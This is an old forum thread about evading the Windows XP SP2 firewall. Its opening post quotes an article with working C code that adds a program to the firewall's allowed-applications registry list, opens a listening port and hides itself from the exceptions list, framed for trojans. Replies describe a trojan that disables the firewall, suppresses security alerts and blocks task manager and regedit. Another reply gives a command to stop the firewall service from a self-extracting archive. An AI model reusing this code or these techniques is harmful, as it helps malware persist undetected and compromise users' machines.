Author Topic: SP2 Firewall (Read 9840 times)

iago · « **on:** September 08, 2005, 09:49:41 am »

This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:

Quote

1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice
#Dedicated to Katka H. from Levoca

How to avoid of detection of server application on Windows XP SP2 firewall

###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...

This trick use only modification of registry keys.Windows Xp SP2 firewall have
list of allowed program in register which are not blocked.If you add new key
to it,your server (malware or trojane) can run freely.

also server can be invisible in following list

start->control panel->windows firewall->exceptions

It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted

Other way how to bypass SP2 firewall ,is to create trojan not as server,but
as client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test :

#c:\bugg.exe Server running on port 2001

connect to server with :

#telnet localhost 2001

##################################################################

Our Registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

and there you can create string value

Value name Value

C:\chat.exe ........ C:\chat.exe:*:Enabled:chat

NO SPACES!!! in key name etc. _C:\chat.exe___

#################################################################
Tested on Windows XP 2005 center media edition with integrated SP2

Source code
(server use ezsocket lib)

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

Quik · « **Reply #1 on:** September 08, 2005, 07:00:56 pm »

Thanks, was looking for some information on SP2's firewall recently.

Joe · « **Reply #2 on:** September 11, 2005, 04:57:38 am »

Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.

Koga73 · « **Reply #3 on:** September 14, 2005, 10:32:51 pm »

i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off

. And the user can add there own blocks if they want.

Newby · « **Reply #4 on:** September 14, 2005, 11:24:23 pm »

Uh, it will not display the message, but I'm guessing that it will still block access.

You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.

Sidoh · « **Reply #5 on:** September 15, 2005, 12:53:40 am »

Quote from: Koga73 on September 14, 2005, 10:32:51 pm

i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off . And the user can add there own blocks if they want.

How incredibly annoying. People who program maliciously suck at life.

Koga73 · « **Reply #6 on:** September 15, 2005, 04:20:12 pm »

when the window closes, it doenst block it, or permantly allow it. Just allows it that time, and next time itll ask u again.

Joe · « **Reply #7 on:** September 15, 2005, 10:48:06 pm »

Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.

Screenor · « **Reply #8 on:** September 18, 2005, 04:01:06 am »

Quote from: Joe[e2] on September 15, 2005, 10:48:06 pm

Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.

Seriously, other then not letting you host games on B.net it's really got no purpose.

iago · « **Reply #9 on:** September 18, 2005, 10:04:42 am »

It blocks incoming traffic. That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others.

It's useful for preventing incoming attcks, like worms, but isn't terribly useful for blocking outbound traffic.

drka · « **Reply #10 on:** September 25, 2005, 08:28:15 pm »

Windows Vista is supposed to have its firewall upgraded so that it does

Quik · « **Reply #11 on:** September 25, 2005, 08:43:47 pm »

Quote from: Mangix on September 25, 2005, 08:28:15 pm

Windows Vista is supposed to have its firewall upgraded so that it does

It does what? A dance? Blocks Sasser? Damn, it better.

drka · « **Reply #12 on:** September 25, 2005, 08:47:31 pm »

blocking outgoing connections and maybe will fix the issue where malware can disable it

iago · « **Reply #13 on:** September 25, 2005, 09:49:06 pm »

Quote from: Mangix on September 25, 2005, 08:47:31 pm

blocking outgoing connections and maybe will fix the issue where malware can disable it

As long as the user can disable it without a password, so can viruses. And people don't like having to put in a password, so that probably won't change.

ink · « **Reply #14 on:** February 14, 2006, 03:05:10 pm »

XP firewall is easily disabled w/ a archivirus (sfx scripting)
all you have to do is set it to run this before extraction:

C:\Windows\system32\net.exe stop alg

This command will shutdown the "Application Layer Gateway Service" which is responsibly for correct functionality of the firewall.

Clan x86

News:

Author Topic: SP2 Firewall (Read 9840 times)

iago

SP2 Firewall

Quik

Re: SP2 Firewall

Joe

Re: SP2 Firewall

Koga73

re

Newby

Re: SP2 Firewall

Sidoh

Re: re

Koga73

Re: SP2 Firewall

Joe

Re: SP2 Firewall

Screenor

Re: SP2 Firewall

iago

Re: SP2 Firewall

drka

Re: SP2 Firewall

Quik

Re: SP2 Firewall

drka

Re: SP2 Firewall

iago

Re: SP2 Firewall

ink

Re: SP2 Firewall